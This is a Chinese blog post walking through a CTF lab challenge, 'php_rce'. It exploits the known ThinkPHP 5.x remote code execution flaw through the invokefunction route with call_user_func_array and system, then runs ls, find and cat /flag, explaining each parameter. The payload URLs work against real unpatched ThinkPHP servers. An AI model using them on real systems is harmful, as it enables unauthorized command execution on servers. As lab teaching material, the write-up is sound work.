攻防世界_php_rce(ThinkPHP框架)

莫名有雪2025-02-04 19:03

打开靶场

点链接,发现是广告,没什么特别的,再看题目php.rce,查一下RCE是什么

RCE(Remote Command Execution)远程命令执行,是一种严重的网络安全漏洞。

RCE指攻击者能通过网络远程控制目标系统,执行恶意命令,获取敏感信息、控制设备、传播恶意软件等,对系统安全和数据造成极大威胁。

常见攻击方式 Web应用漏洞利用:如PHP应用中,若对用户输入过滤不严格,攻击者可通过表单、URL参数等注入恶意命令,借助服务器执行命令的函数,像 system() 、 exec() 等实现远程命令执行。

发现ThinkPHP是一个框架

尝试错误参数或任意版本,试错

输入?s=s或?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

  • s=index/\think\Container/invokefunction
    • 在 ThinkPHP 框架中,s 一般作为路由参数。这里指定要调用 \think\Container 类的 invokefunction 方法。\think\Container 是 ThinkPHP 的容器类,其主要作用是管理对象的依赖注入和实例化。invokefunction 方法可能用于动态调用其他函数。
  • function=call_user_func_array
    • function 参数指定要调用的函数为 call_user_func_array。这是 PHP 的一个内置函数,它可以调用任意函数,并将参数以数组的形式传递给被调用的函数。
  • vars[0]=system
    • vars 是一个数组参数,vars[0] 的值为 system,表明要调用的具体函数是 system。在 PHP 里,system 函数用于执行外部系统命令,并返回命令执行的输出结果。
  • vars[1][]=ls
    • vars[1] 是传递给 system 函数的参数,值为 lsls 是类 Unix 系统(如 Linux、macOS)中的命令,用于列出当前目录下的文件和文件夹信息。

发现ThinkPHP漏洞为5.0.20版本,输入

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

  • s=index/\think\app/invokefunction
    • 在 ThinkPHP 框架里,s 通常作为路由参数。这里指定要调用 \think\app 类中的 invokefunction 方法,该方法可能具备动态调用其他函数的功能。
  • function=call_user_func_array
    • function 参数明确要使用 call_user_func_array 函数。此函数是 PHP 的内置函数,它可以调用任意函数,并将参数以数组形式传递给被调用的函数。
  • vars[0]=system
    • vars 是一个数组参数,vars[0] 的值为 system,意味着要调用的具体函数是 systemsystem 函数在 PHP 中用于执行外部系统命令,并将命令执行结果输出。
  • vars[1][]=ls
    • vars[1] 是传递给 system 函数的参数,值为 lsls 是 Linux 或 macOS 等类 Unix 系统中的命令,用于列出当前目录下的文件和文件夹信息。

输入 ,试图通过执行 find / -name "flag" 命令来查找服务器上名为 flag 的文件

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

  • s=index/\think\app/invokefunction
    • s 一般是路由参数,在 ThinkPHP 框架里用于指定路由规则。这里指定的路由路径 index/\think\app/invokefunction 指向了 \think\app 类中的 invokefunction 方法,这个方法可能具备动态调用函数的能力。
  • function=call_user_func_array
    • function 参数指定要调用的函数为 call_user_func_arraycall_user_func_array 是 PHP 的一个内置函数,它能够调用任意用户自定义或内置的函数,并且可以将参数以数组的形式传递给被调用的函数。
  • vars[0]=system
    • vars 是一个数组参数,vars[0] 的值为 system,这意味着要调用的具体函数是 system 函数。在 PHP 中,system 函数用于执行外部系统命令,并将命令的输出返回。
  • vars[1][]=find / -name "flag"
    • vars[1] 是传递给 system 函数的参数数组,这里的值为 find / -name "flag",这是一个 Linux 系统命令,其作用是在根目录 / 下查找所有名为 flag 的文件。

输入

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

  • s=index/\think\app/invokefunction
    • s 是 ThinkPHP 框架里用于指定路由的参数。这里指定的路由指向 \think\app 类的 invokefunction 方法,此方法可能具备动态调用函数的功能。
  • function=call_user_func_array
    • function 参数明确要调用的函数是 call_user_func_array。这是 PHP 的一个内置函数,其作用是调用指定的函数,并将参数以数组形式传递给该函数。
  • vars[0]=system
    • vars 是一个数组参数,vars[0] 的值为 system,表明要调用的具体函数是 system。在 PHP 中,system 函数用于执行外部系统命令,并返回命令执行的输出结果。
  • vars[1][]=cat /flag
    • vars[1] 是传递给 system 函数的参数,值为 cat /flagcat 是 Linux 系统中的一个命令,用于查看文件内容,/flag 是文件路径,这个命令的目的是读取根目录下名为 flag 的文件内容。

参考链接:[CTF_网络安全] 攻防世界 php_rce 解题详析

相关推荐
皓月盈江5 小时前
Linux电脑本机使用小皮面板集成环境开发调试WEB项目
linux·php·web开发·phpstudy·小皮面板·集成环境·www.xp.cn
向哆哆15 小时前
Netty在Java网络编程中的应用:实现高性能的异步通信
java·网络·php
Rverdoser17 小时前
代理服务器运行速度慢是什么原因
开发语言·前端·php
森叶18 小时前
从 JIT 即时编译一直讲到CGI|FastGGI|WSGI|ASGI四种协议的实现细节
python·php·web
myusa220 小时前
使用阿里云CLI跨地域迁移ECS实例
数据库·阿里云·php
互联网搬砖老肖3 天前
运维打铁:服务器分类及PHP入门
运维·服务器·php
Mr.小怪3 天前
K8s网络从0到1
网络·kubernetes·php
剑哥在胡说3 天前
高并发PHP部署演进:从虚拟机到K8S的DevOps实践优化
kubernetes·php·devops
fakaifa3 天前
【开源版】likeshop上门家政系统PHP版全开源+uniapp前端
小程序·uni-app·php·家政小程序源码·家政服务小程序·源码下载·上门家政
从零开始学习人工智能3 天前
探索网络设备安全:Shodan 的原理与合法应用
网络·安全·php
热门推荐
01YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03KGG转MP3工具|非KGM文件|解密音频04YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU05【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!06Coze扣子平台完整体验和实践(附国内和国际版对比)07组基轨迹建模 GBTM的介绍与实现(Stata 或 R)08yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记09DeepSeek各版本说明与优缺点分析10【操作系统】Linux之网络编程(TCP)(头歌作业)